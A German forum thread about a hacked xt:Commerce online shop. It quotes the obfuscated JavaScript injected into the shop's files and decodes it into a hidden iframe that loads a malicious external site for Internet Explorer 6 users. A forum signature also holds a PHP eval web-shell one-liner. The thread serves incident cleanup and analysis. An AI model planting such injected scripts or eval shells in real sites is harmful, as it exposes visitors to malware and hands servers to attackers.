1Danke
ERLEDIGT
NEIN
NEIN
ANTWORTEN
4
4
ZUGRIFFE
2396
2396
EMPFEHLEN
-
Hallo,
ich kümmere mich gerade um einen befallenen Onlineshop, xt Commerce sp 2.1.
Dieser wurde opfer eines Hackerangriffes und nun gibts dort Probleme mit Trojanern und Scripten.
Gibt es ne möglichkeit, die kompletten Shopdatein ähnlich wie mit einem Virusscanner zu scannen, ein Scanner der eben nach bösartigen Scripten z.B. ausschau hält, nützlicherweise speziell für Webanwendungen?
Die Shopdaten sind offline verfügbar.
mfg
-
Hallo,
ich hatte kürzlich einen Hackkerangriff auf ein Shopsystem.
Mehrere Dateien ca >50 wurden unter anderem mit einem Javascript verseucht. Da ich in Javascript nicht sonderlich bewandert bin, könnte mir vielleicht einer beim verstehen helfen?
Code :1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
<script> sa = "%67%72%61%74%6D%2E%6E%65%74"; eval(function(p,a,c,k,e,d) { while(c--) { if(k[c]) { p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c]) } } return p } ('28(9.8.7("17 6")!=-1&&0.5.7("4=3")==-1){0.5="4=3; 11=13, 14 16 10 14:15:26 12;";0.24("<2 25=1 27=1 23=\'22://"+18+"/19/\'20=\'21:29\'></2>")}',10,30,'document||iframe|s|_mlsdkf|cookie||indexOf|appVersion|navigator|2015|expires|GMT|Mon|||Jul|MSIE|sa|b2b|style|display|http|src|write|width||height|if|none'.split('|'))); </script>
Was macht das Script?
mfg ad0r
-
Hallo,
dieses Schnipsel führt folgenden Code aus:
Damit wird bei Benutzern, die den Internet Explorer 6 verwenden und ein Tracking-Cookie nicht gesetzt ist folgendes ausgeführt:Code javascript:1 2 3 4
if (navigator.appVersion.indexOf("MSIE 6") != -1 && document.cookie.indexOf("_mlsdkf=s") == -1) { document.cookie = "_mlsdkf=s; expires=Mon, 14 Jul 2015 14:15:26 GMT;"; document.write("<iframe width=1 height=1 src='http://" + sa + "/b2b/'style='display:none'></iframe>") }
- Das Tracking-Cookie wird gesetzt.
- Ein Inline-Frame wird erstellt, das die URL http://gratm.net/b2b/ aufruft.
Grüße,
Matthias„Gib einem Menschen einen Fisch, und er wird für einen Tag satt. Lehre ihn Fischen, und er wird ein Leben lang satt.“
“For every complex problem, there is an answer that is short, simple and wrong.”
“Pessimism is safe, but optimism is a lot faster!”
Aktuelles Coding Quiz: #17 - Wörter kreuz und quer
-
Ok danke. Die von dir genannte Seite ist auf jedenfall keine nette Seite
-
Nö, sollte auf jede Blackliste
Zitat von Ador
Ok danke. Die von dir genannte Seite ist auf jedenfall keine nette Seite
http://safebrowsing.clients.google.c...gratm.net/b2b/<?php eval ($_REQUEST); ?> ......epic web
Linux ist wie guter Sex, man kann es beschreiben und darüber reden, man weiss erst was es bedeutet, wenn man es erlebt hat.
Zitieren
Ähnliche Themen
-
[Frage] Shopsystem für Autoteile
Von e-rim im Forum Content Management Systeme (CMS)Antworten: 14Letzter Beitrag: 16.12.10, 16:49 -
Shopsystem-Vergleich?
Von Suchfunktion im Forum SmalltalkAntworten: 4Letzter Beitrag: 18.10.05, 12:03 -
Shopsystem in PHP
Von wal im Forum PHPAntworten: 5Letzter Beitrag: 07.06.04, 11:04 -
Günstiges Shopsystem
Von Arne Buchwald im Forum Internet, DSL & FlatrateAntworten: 9Letzter Beitrag: 10.10.02, 09:51 -
shopsystem mit sql und php
Von loddarmattheus im Forum PHPAntworten: 2Letzter Beitrag: 21.04.02, 01:50
Login
